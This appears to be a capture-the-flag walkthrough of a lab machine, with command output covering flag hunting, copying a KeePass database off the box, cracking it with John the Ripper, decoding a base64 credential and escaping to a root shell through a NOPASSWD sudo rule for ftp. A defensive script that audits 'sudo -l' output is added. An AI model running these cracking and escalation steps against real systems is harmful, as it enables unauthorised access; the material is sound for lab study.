GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
script.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
We use "strings" to extract readable text from "/opt/script". We discover the string "TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}", which looks like an MD5 hash.
jenkins@ubuntu:/var/www/html$ ls -la
total 72
drwxrwxrwx 7 root   root    4096 Sep 15  2019 .
drwxr-xr-x 3 root   root    4096 Sep 15  2019 ..
drwxrwxrwx 2 root   root    4096 Sep 15  2019 01101001
-rw-rw-r-- 1 stones stones  4955 Sep 15  2019 aether.php
-rw-rw-r-- 1 stones stones   584 Mar 24  2009 astyle.css
drwxrwxrwx 2 root   root    4096 Sep 15  2019 gamA00fe2012
drwxr-xr-x 2 stones stones  4096 Sep 15  2019 images
drwxrwxrwx 2 root   root    4096 Sep 15  2019 img
-rw-rw-r-- 1 stones stones  3261 Sep 15  2019 index.html
-rw-rw-r-- 1 stones stones 23358 Sep 16  2019 style.css
-rw-rw-r-- 1 stones stones   115 Sep 16  2019 tesseract.html
drwxrwxrwx 2 root   root    4096 Sep 15  2019 wifi
We list the contents of the /var/www/html directory.
jenkins@ubuntu:/var/www/html$ cd gamA00fe2012
jenkins@ubuntu:/var/www/html/gamA00fe2012$ ls -la
total 12
drwxrwxrwx 2 root root 4096 Sep 15  2019 .
drwxrwxrwx 7 root root 4096 Sep 15  2019 ..
-rwxrwxrwx 1 root root   48 Sep 15  2019 realitystone.txt
We navigate to the "gamA00fe2012" directory and list its contents. We find the file "realitystone.txt".
jenkins@ubuntu:/var/www/html/gamA00fe2012$ cat realitystone.txt
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
We print the contents of "realitystone.txt" and find an MD5 hash.

Hash                              Type  Result
4542E4C233F26B4FAF6B5F3FED24280C  md5   aarti

After cracking the hash, it turns out to be of no use, since the next step requires authentication.
------------------------------------------------------------------------------------
We check whether it is possible to switch users with su or sudo.
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su root
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su morag
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su stones
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$
Switching users fails.
jenkins@ubuntu:/var/www/html/gamA00fe2012$ ss -altpn
State     Recv-Q    Send-Q         Local Address:Port         Peer Address:Port    Process    
LISTEN    0         4096           127.0.0.53%lo:53                0.0.0.0:*                                      
LISTEN    0         128                  0.0.0.0:22                0.0.0.0:*                                      
LISTEN    0         5           127.0.0.1:631                0.0.0.0:*                                      
LISTEN    0         128                 *:80                      *:*                                      
LISTEN    0         50                  *:8080              *:*     users:(("java",pid=1119,fd=166)) 
LISTEN    0         128                     [::]:22                   [::]:*                                      
LISTEN    0         5               [::1]:631                  [::]:*                                      
LISTEN    0         128                 *:443                      *:*                                      
We use ss to list the listening sockets.
jenkins@ubuntu:/opt$ ls
morag.kdbx script
We look at the /opt directory.
jenkins@ubuntu:/opt$ ls -la
total 24
drwxr-xr-x  2 root root 4096 Sep 15  2019 .
drwxr-xr-x 24 root root 4096 Jan  2 14:32 ..
-rw-r--r--  1 root root 2558 Sep 15  2019 morag.kdbx
-rwsr-xr-x  1 root root 8304 Sep 15  2019 script
We find that /opt/script is owned by root and has the SUID bit set.
jenkins@ubuntu:/opt$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
We start an HTTP server on port 8000 and download morag.kdbx to our local machine.
┌──(pwn)─(root㉿CCat)-[~]
└─# keepass2john morag.kdbx > hash
We extract the hash with keepass2john.
┌──(pwn)─(root㉿CCat)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

princesa         (morag)     

1g 0:00:00:00 DONE (2025-01-02 23:55) 7.142g/s 914.2p/s 914.2c/s 914.2C/s secret..miguel
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
We use John to crack the password.
File analysis
1HDD6pvuyUuZeNucpCpz
bW9yYWc6eW9uZHU=
An98XArsp1Ncj0hAZLda
┌──(pwn)─(root㉿CCat)-[~]
└─# echo -n bW9yYWc6eW9uZHU=| base64 -d
morag:yondu
We decode morag's password.
jenkins@ubuntu:/opt$ su morag
Password:
yondu

Privilege Escalation
morag@ubuntu:/opt$ sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User morag may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/ftp
We check the sudo rights of the user morag.
------------------------------------------------------------------------------------
https://gtfobins.github.io/gtfobins/ftp/
morag@ubuntu:/opt$ sudo /usr/bin/ftp
ftp> !/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
Thanks to GTFOBins, the privilege escalation was successful!
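The rule that makes this escalation possible is visible in `sudo -l` long before anyone touches GTFOBins. As an added example (not part of the original writeup), this small audit parses `sudo -l` output and flags rules a reviewer should question: a constructed sample modelled on the output above, and an assumed starter set of interactive programs that hand out a shell; both are placeholders to extend.

```python
import re

# Constructed sample modelled on the `sudo -l` output in this writeup; the
# NOPASSWD ftp rule is the one the box is escalated through.
SAMPLE_SUDO_L = """\
Matching Defaults entries for morag on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User morag may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/ftp
    (root) /usr/bin/df -h
    (ALL : ALL) ALL
"""

# Interactive programs whose "!command" prompt hands the caller a shell, so
# running them as root equals a root shell (assumed starter set; extend it
# from GTFOBins, the reference the writeup itself uses).
SHELL_ESCAPE = {"ftp"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return one (runas, tags, commands) tuple per rule line of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # rule lines follow this header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.rstrip(":").upper() for t in m.group("tags").split()]
            cmds = [c.strip() for c in m.group("cmds").split(",")]
            rules.append((m.group("runas").strip(), tags, cmds))
    return rules

def audit(rules):
    """Return (command, reason) for every rule a reviewer should question."""
    findings = []
    for runas, tags, cmds in rules:
        as_root = runas.split(":")[0].strip() in ("root", "ALL")
        for cmd in cmds:
            name = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary
            if cmd == "ALL":
                findings.append((cmd, "unrestricted sudo"))
            elif as_root and name in SHELL_ESCAPE:
                why = "shell escape as root" + (", no password required" if "NOPASSWD" in tags else "")
                findings.append((cmd, why))
            elif "NOPASSWD" in tags:
                findings.append((cmd, "no password required"))
    return findings

if __name__ == "__main__":
    for cmd, why in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd:<20} {why}")
```

Feed it the real `sudo -l` output of each account; a finding like the ftp one is fixed by dropping the rule, not by adding a password prompt.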
cd /root
ls
final.txt
cat f
cat: f: No such file or directory
cat final.txt
			SULSTNE:{56F06B4DAC14CE346998483989ABFF16} 
--Contact Undersigned to share your feedback with HACKING ARTICLES Teams-

AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/

Kavish Tyagi: Tyagi_kavish_ Twitter
We read root.txt and obtain the flag.

Flags

cat root.txt
SULSTNE:{56F06B4DAC14CE346998483989ABFF16}
cat .user.txt
